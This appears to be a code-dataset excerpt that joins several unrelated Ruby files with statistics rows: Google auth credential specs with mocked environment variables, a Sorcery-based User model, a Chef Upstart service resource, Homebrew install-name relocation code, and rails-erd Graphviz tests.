allow(::File).to receive(:file?).with("/unknown/path/to/file.txt") { true }
allow(::File).to receive(:read).with("/unknown/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials2.default
expect(creds).to be_a_kind_of(TestCredentials2)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use JSON_ENV_VARS to get keyfile contents" do
test_json_env_val = JSON.generate default_keyfile_hash
class TestCredentials3 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = %w[JSON_ENV_DUMMY JSON_ENV_TEST].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::ENV).to receive(:[]).with("JSON_ENV_TEST") { test_json_env_val }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials3.default
expect(creds).to be_a_kind_of(TestCredentials3)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use DEFAULT_PATHS to get keyfile path" do
class TestCredentials4 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { true }
allow(::File).to receive(:read).with("~/default/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials4.default
expect(creds).to be_a_kind_of(TestCredentials4)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default" do
class TestCredentials5 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["PATH_ENV_DUMMY"].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq([TestCredentials5::SCOPE])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials5.default
expect(creds).to be_a_kind_of(TestCredentials5)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "can be subclassed to pass in other env paths" do
class TestCredentials6 < Google::Auth::Credentials
TOKEN_CREDENTIAL_URI = "https://example.com/token".freeze
AUDIENCE = "https://example.com/audience".freeze
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["TEST_PATH"].freeze
JSON_ENV_VARS = ["TEST_JSON_VARS"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"]
end
class TestCredentials7 < TestCredentials6
end
expect(TestCredentials7.token_credential_uri).to eq("https://example.com/token")
expect(TestCredentials7.audience).to eq("https://example.com/audience")
expect(TestCredentials7.scope).to eq(["http://example.com/scope"])
expect(TestCredentials7.env_vars).to eq(["TEST_PATH", "TEST_JSON_VARS"])
expect(TestCredentials7.paths).to eq(["~/default/path/to/file.txt"])
TestCredentials7::TOKEN_CREDENTIAL_URI = "https://example.com/token2"
expect(TestCredentials7.token_credential_uri).to eq("https://example.com/token2")
TestCredentials7::AUDIENCE = nil
expect(TestCredentials7.audience).to eq("https://example.com/audience")
end
end
describe "using class methods" do
it "can be subclassed to pass in other env paths" do
test_path_env_val = "/unknown/path/to/file.txt".freeze
test_json_env_val = JSON.generate default_keyfile_hash
ENV["TEST_PATH"] = test_path_env_val
ENV["TEST_JSON_VARS"] = test_json_env_val
class TestCredentials11 < Google::Auth::Credentials
self.token_credential_uri = "https://example.com/token"
self.audience = "https://example.com/audience"
self.scope = "http://example.com/scope"
self.env_vars = ["TEST_PATH", "TEST_JSON_VARS"]
end
allow(::File).to receive(:file?).with(test_path_env_val) { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://example.com/token")
expect(options[:audience]).to eq("https://example.com/audience")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials11.default
expect(creds).to be_a_kind_of(TestCredentials11)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use PATH_ENV_VARS to get keyfile path" do
class TestCredentials12 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY PATH_ENV_TEST JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("PATH_ENV_TEST") { "/unknown/path/to/file.txt" }
allow(::File).to receive(:file?).with("/unknown/path/to/file.txt") { true }
allow(::File).to receive(:read).with("/unknown/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials12.default
expect(creds).to be_a_kind_of(TestCredentials12)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use JSON_ENV_VARS to get keyfile contents" do
test_json_env_val = JSON.generate default_keyfile_hash
class TestCredentials13 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY JSON_ENV_TEST]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::ENV).to receive(:[]).with("JSON_ENV_TEST") { test_json_env_val }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials13.default
expect(creds).to be_a_kind_of(TestCredentials13)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use DEFAULT_PATHS to get keyfile path" do
class TestCredentials14 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { true }
allow(::File).to receive(:read).with("~/default/path/to/file.txt") { json_content }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(json_content)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials14.default
expect(creds).to be_a_kind_of(TestCredentials14)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with self-signed jwt enabled" do
class TestCredentials15 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(TestCredentials15.scope)
expect(options[:enable_self_signed_jwt]).to eq(true)
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials15.default enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials15)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with self-signed jwt disabled" do
class TestCredentials16 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(TestCredentials16.scope)
expect(options[:enable_self_signed_jwt]).to be_nil
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials16.default
expect(creds).to be_a_kind_of(TestCredentials16)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses that find no matches default to Google::Auth.get_application_default with custom values" do
scope2 = "http://example.com/scope2"
class TestCredentials17 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.env_vars = %w[PATH_ENV_DUMMY JSON_ENV_DUMMY]
self.paths = ["~/default/path/to/file.txt"]
self.token_credential_uri = "https://example.com/token2"
self.audience = "https://example.com/token3"
end
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("JSON_ENV_DUMMY") { nil }
allow(::File).to receive(:file?).with("~/default/path/to/file.txt") { false }
mocked_signet = mock_signet
allow(Google::Auth).to receive(:get_application_default) do |scope, options|
expect(scope).to eq(scope2)
expect(options[:enable_self_signed_jwt]).to eq(false)
expect(options[:token_credential_uri]).to eq("https://example.com/token2")
expect(options[:audience]).to eq("https://example.com/token3")
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials17.default scope: scope2, enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials17)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses delegate up the class hierarchy" do
class TestCredentials18 < Google::Auth::Credentials
self.scope = "http://example.com/scope"
self.target_audience = "https://example.com/target_audience"
self.env_vars = ["TEST_PATH", "TEST_JSON_VARS"]
self.paths = ["~/default/path/to/file.txt"]
end
class TestCredentials19 < TestCredentials18
end
expect(TestCredentials19.scope).to eq(["http://example.com/scope"])
expect(TestCredentials19.target_audience).to eq("https://example.com/target_audience")
expect(TestCredentials19.env_vars).to eq(["TEST_PATH", "TEST_JSON_VARS"])
expect(TestCredentials19.paths).to eq(["~/default/path/to/file.txt"])
TestCredentials19.token_credential_uri = "https://example.com/token2"
expect(TestCredentials19.token_credential_uri).to eq("https://example.com/token2")
TestCredentials19.token_credential_uri = nil
expect(TestCredentials19.token_credential_uri).to eq("https://oauth2.googleapis.com/token")
end
end
it "warns when cloud sdk credentials are used" do
mocked_signet = double "Signet::OAuth2::Client"
allow(mocked_signet).to receive(:configure_connection).and_return(mocked_signet)
allow(mocked_signet).to receive(:needs_access_token?).and_return(true)
allow(mocked_signet).to receive(:fetch_access_token!).and_return(true)
allow(Signet::OAuth2::Client).to receive(:new) do |_options|
mocked_signet
end
allow(mocked_signet).to receive(:client_id).and_return(Google::Auth::CredentialsLoader::CLOUD_SDK_CLIENT_ID)
expect { Google::Auth::Credentials.new default_keyfile_hash }.to output(
Google::Auth::CredentialsLoader::CLOUD_SDK_CREDENTIALS_WARNING + "\n"
).to_stderr
end
it "does not fetch access token when initialized with a Signet::OAuth2::Client object that already has a token" do
signet = Signet::OAuth2::Client.new access_token: token # Client#needs_access_token? will return false
creds = Google::Auth::Credentials.new signet
expect(creds.client).to eq(signet)
end
end
| 48.552941 | 537 | 0.69272 |
26945a8f2334d2a10c21a5b5a1e237839d2b4eff | 2,868 | # == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# access_state :string(255)
# activation_state :string(255)
# activation_token :string(255)
# activation_token_expires_at :datetime
# crypted_password :string(255)
# deleted_at :datetime
# email :string(255) not null
# language :string
# last_activity_at :datetime
# last_login_at :datetime
# last_login_from_ip_address :string(255)
# last_logout_at :datetime
# remember_me_token :string(255)
# remember_me_token_expires_at :datetime
# reset_password_email_sent_at :datetime
# reset_password_token :string(255)
# reset_password_token_expires_at :datetime
# salt :string(255)
# created_at :datetime
# updated_at :datetime
#
# Indexes
#
# index_users_on_activation_token (activation_token)
# index_users_on_email (email) UNIQUE
# index_users_on_last_login_at (last_login_at)
# index_users_on_remember_me_token (remember_me_token)
# index_users_on_reset_password_token (reset_password_token)
#
class User < ApplicationRecord
authenticates_with_sorcery!
validates :password, confirmation: true, length: { minimum: 6 }, on: :create
validates :password, confirmation: true, length: { minimum: 6 }, on: :update, if: :password?
validates :email, presence: true, uniqueness: true
validate do
errors.add(:email, :postmaster) if email && email[/postmaster/]
end
before_validation :downcase_email
def activated?
activation_state == "active"
end
def activation_pending?
activation_state == "pending"
end
def password?
password.present?
end
def send_activation_needed_email!
Authentication::MailerWorker.perform_async(:activation_needed,
[email, activation_token, language])
end
def send_activation_success_email!
Authentication::MailerWorker.perform_async(:activation_success, email)
end
def send_reset_password_email!
Authentication::MailerWorker.perform_async(:reset_password,
[email, reset_password_token])
end
def last_login_from_ip_address=(arg)
# stub
end
def downcase_email
unless self.email.nil?
email.downcase!
email.gsub!(/\(.*\)/){|comment| ''}
email.gsub!(%r(^[a-zA-Z0-9!\#$%&'*+-\/=?^_`\{\}~.@|]), '')
end
end
def self.delete_pending_users
transaction do
where("created_at < ? and activation_state = 'pending'",
Date.today - Authentication.delete_after).each(&:destroy)
end
end
end
| 31.516484 | 94 | 0.624128 |
11603e8423d57d153195ca3b1ac2772bbaf96da4 | 121 | class AddlowaccountToUsers < ActiveRecord::Migration
def change
add_column :users, :low_account, :string
end
end
| 20.166667 | 52 | 0.768595 |
bbb035a491164a66522d6831fee0ecf73f1b1c99 | 41 | module Fabricate
VERSION = "0.0.1"
end
| 10.25 | 19 | 0.682927 |
39796f0d998df2b8e264ad9e19a1187cd3d1dbfc | 1,324 | module AnchorCookbook
class AnchorServiceManagerUpstart < AnchorServiceBase
use_automatic_resource_name
provides :anchor_service, platform: 'ubuntu'
property :anchor_home, String, default: '/opt/anchor/current'
property :anchor_venv, String, default: '/opt/anchor/.venv'
property :username, String, default: 'anchor'
property :groupname, String, default: 'anchor'
action :start do
package 'uwsgi-plugin-python3'
template '/etc/init/anchor.conf' do
source 'upstart/anchor.conf.erb'
owner 'root'
group 'root'
mode '0644'
cookbook 'anchor'
variables(
anchor_python_home: new_resource.anchor_home,
anchor_virtualenv: new_resource.anchor_venv,
anchor_user: new_resource.username,
anchor_group: new_resource.groupname
)
action :create
notifies :restart, 'service[anchor]'
end
service 'anchor' do
provider Chef::Provider::Service::Upstart
ignore_failure true
action :start
end
end
action :stop do
service 'anchor' do
provider Chef::Provider::Service::Upstart
supports status: true
action :stop
end
end
action :restart do
action_stop
action_start
end
end
end
| 25.461538 | 65 | 0.641994 |
bff97842ce578fbd3da5faadddea93d5bf305f0e | 6,319 | class Keg
def fix_install_names options={}
mach_o_files.each do |file|
install_names_for(file, options) do |id, bad_names|
file.ensure_writable do
install_name_tool("-id", id, file) if file.dylib?
bad_names.each do |bad_name|
new_name = fixed_name(file, bad_name)
unless new_name == bad_name
install_name_tool("-change", bad_name, new_name, file)
end
end
end
end
end
end
def relocate_install_names old_prefix, new_prefix, old_cellar, new_cellar, options={}
mach_o_files.each do |file|
install_names_for(file, options, relocate_reject_proc(old_prefix)) do |id, old_prefix_names|
file.ensure_writable do
new_prefix_id = id.to_s.gsub old_prefix, new_prefix
install_name_tool("-id", new_prefix_id, file) if file.dylib?
old_prefix_names.each do |old_prefix_name|
new_prefix_name = old_prefix_name.to_s.gsub old_prefix, new_prefix
install_name_tool("-change", old_prefix_name, new_prefix_name, file)
end
end
end
install_names_for(file, options, relocate_reject_proc(old_cellar)) do |id, old_cellar_names|
file.ensure_writable do
old_cellar_names.each do |old_cellar_name|
new_cellar_name = old_cellar_name.to_s.gsub old_cellar, new_cellar
install_name_tool("-change", old_cellar_name, new_cellar_name, file)
end
end
end
end
# Search for pkgconfig .pc files and relocate references to the cellar
old_cellar = HOMEBREW_CELLAR if old_cellar == :any
old_prefix = HOMEBREW_PREFIX if old_prefix == :any
old_cellar = Regexp.escape(old_cellar)
old_prefix = Regexp.escape(old_prefix)
pkgconfig_files.each do |pcfile|
pcfile.ensure_writable do
pcfile.open('rb') do |f|
s = f.read
# These regexes match lines of the form: prefix=/usr/local/Cellar/foo/1.2.3/lib
# and (assuming new_cellar is "/tmp") transform them into: prefix="/tmp/foo/1.2.3/lib"
# If the original line did not have quotes, we add them in automatically
s.gsub!(%r[([\S]+)="?#{old_cellar}(.*?)"?$], "\\1=\"#{new_cellar}\\2\"")
s.gsub!(%r[([\S]+)="?#{old_prefix}(.*?)"?$], "\\1=\"#{new_prefix}\\2\"")
f.reopen(pcfile, 'wb')
f.write(s)
end
end
end
end
  # Detects the C++ dynamic libraries in place, scanning the dynamic links
  # of the Mach-O files within the keg (the contents of bin/, lib/ and
  # Frameworks/, as collected by mach_o_files below).
# Note that this doesn't attempt to distinguish between libstdc++ versions,
# for instance between Apple libstdc++ and GNU libstdc++
def detect_cxx_stdlibs
results = Set.new
mach_o_files.each do |file|
dylibs = file.dynamically_linked_libraries
results << :libcxx unless dylibs.grep(/libc\+\+.+\.dylib/).empty?
results << :libstdcxx unless dylibs.grep(/libstdc\+\+.+\.dylib/).empty?
end
results.to_a
end
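  # Illustrative use of detect_cxx_stdlibs (not part of the original file;
  # the keg path below is hypothetical):
  #
  #   keg = Keg.new(HOMEBREW_CELLAR + "foo/1.2.3")
  #   keg.detect_cxx_stdlibs  #=> [:libcxx] if only libc++ is linked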
private
OTOOL_RX = /\t(.*) \(compatibility version (\d+\.)*\d+, current version (\d+\.)*\d+\)/
def install_name_tool(*args)
system(MacOS.locate("install_name_tool"), *args)
end
  # If file is a dylib or bundle itself, look for the dylib named by
  # bad_name relative to the file's own directory; for executables, look
  # relative to the keg's lib directory. Either way we can skip the more
  # expensive recursive search if possible.
def fixed_name(file, bad_name)
if (file.dylib? || file.mach_o_bundle?) && (file.parent + bad_name).exist?
"@loader_path/#{bad_name}"
elsif file.mach_o_executable? && (lib + bad_name).exist?
"#{lib}/#{bad_name}"
elsif (abs_name = find_dylib(Pathname.new(bad_name).basename)) && abs_name.exist?
abs_name.to_s
else
opoo "Could not fix #{bad_name} in #{file}"
bad_name
end
end
def lib; join 'lib' end
def default_reject_proc
Proc.new do |fn|
# Don't fix absolute paths unless they are rooted in the build directory
tmp = ENV['HOMEBREW_TEMP'] ? Regexp.escape(ENV['HOMEBREW_TEMP']) : '/tmp'
fn[0,1] == '/' and not %r[^#{tmp}] === fn
end
end
def relocate_reject_proc(path)
Proc.new { |fn| not fn.start_with?(path) }
end
def install_names_for file, options, reject_proc=default_reject_proc
ENV['HOMEBREW_MACH_O_FILE'] = file.to_s # solves all shell escaping problems
install_names = `#{MacOS.locate("otool")} -L "$HOMEBREW_MACH_O_FILE"`.split "\n"
install_names.shift # first line is fluff
install_names.map!{ |s| OTOOL_RX =~ s && $1 }
# Bundles and executables do not have an ID
id = install_names.shift if file.dylib?
install_names.compact!
install_names.reject!{ |fn| fn =~ /^@(loader_|executable_|r)path/ }
install_names.reject!{ |fn| reject_proc.call(fn) }
# the shortpath ensures that library upgrades don’t break installed tools
relative_path = Pathname.new(file).relative_path_from(self)
shortpath = HOMEBREW_PREFIX.join(relative_path)
id = if shortpath.exist? and not options[:keg_only]
shortpath
else
"#{HOMEBREW_PREFIX}/opt/#{fname}/#{relative_path}"
end
yield id, install_names
end
def find_dylib name
(join 'lib').find do |pn|
break pn if pn.basename == Pathname.new(name)
end
end
def mach_o_files
mach_o_files = []
dirs = %w{bin lib Frameworks}
dirs.map! { |dir| join(dir) }
dirs.reject! { |dir| not dir.directory? }
dirs.each do |dir|
dir.find do |pn|
next if pn.symlink? or pn.directory?
mach_o_files << pn if pn.dylib? or pn.mach_o_bundle? or pn.mach_o_executable?
end
end
mach_o_files
end
def pkgconfig_files
pkgconfig_files = []
# find .pc files, which are stored in lib/pkgconfig
pc_dir = self/'lib/pkgconfig'
if pc_dir.directory?
pc_dir.find do |pn|
next if pn.symlink? or pn.directory? or pn.extname.to_s != '.pc'
pkgconfig_files << pn
end
end
# find name-config scripts, which can be all over the keg
Pathname.new(self).find do |pn|
next if pn.symlink? or pn.directory?
pkgconfig_files << pn if pn.text_executable? and pn.basename.to_s.end_with? '-config'
end
pkgconfig_files
end
end
| 33.433862 | 98 | 0.651685 |
d588e4d94c561d9878def97dc241b62c13e2626e | 16,662 | require File.expand_path("../test_helper", File.dirname(__FILE__))
require "rails_erd/diagram/graphviz"
class GraphvizTest < ActiveSupport::TestCase
def setup
RailsERD.options.filetype = :png
RailsERD.options.warn = false
end
def teardown
FileUtils.rm Dir["erd*.*"] rescue nil
end
def diagram(options = {})
@diagram ||= Diagram::Graphviz.new(Domain.generate(options), options).tap do |diagram|
diagram.generate
end
end
def find_dot_nodes(diagram)
[].tap do |nodes|
diagram.graph.each_node do |name, node|
nodes << node
end
end
end
def find_dot_node(diagram, name)
diagram.graph.get_node(name)
end
def find_dot_node_pairs(diagram)
[].tap do |edges|
diagram.graph.each_edge do |edge|
edges << [edge.node_one, edge.node_two]
end
end
end
def find_dot_edges(diagram)
[].tap do |edges|
diagram.graph.each_edge do |edge|
edges << edge
end
end
end
def find_dot_edge_styles(diagram)
find_dot_edges(diagram).map { |e| [e[:arrowtail].to_s.tr('"', ''), e[:arrowhead].to_s.tr('"', '')] }
end
# Diagram properties =======================================================
test "file name should depend on file type" do
create_simple_domain
begin
assert_equal "erd.svg", Diagram::Graphviz.create(:filetype => :svg)
ensure
FileUtils.rm "erd.svg" rescue nil
end
end
test "rank direction should be tb for horizontal orientation" do
create_simple_domain
assert_equal '"TB"', diagram(:orientation => "horizontal").graph[:rankdir].to_s
end
test "rank direction should be lr for vertical orientation" do
create_simple_domain
assert_equal '"LR"', diagram(:orientation => "vertical").graph[:rankdir].to_s
end
# Diagram generation =======================================================
test "create should create output for domain with attributes" do
create_model "Foo", :bar => :references, :column => :string do
belongs_to :bar
end
create_model "Bar", :column => :string
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create
end
test "create should create output for domain without attributes" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create
end
test "create should write to file with dot extension if type is dot" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:filetype => :dot)
end
test "create should create output for filenames that have spaces" do
create_simple_domain
Diagram.any_instance.expects(:save)
Diagram::Graphviz.create(:filename => "erd with spaces")
end
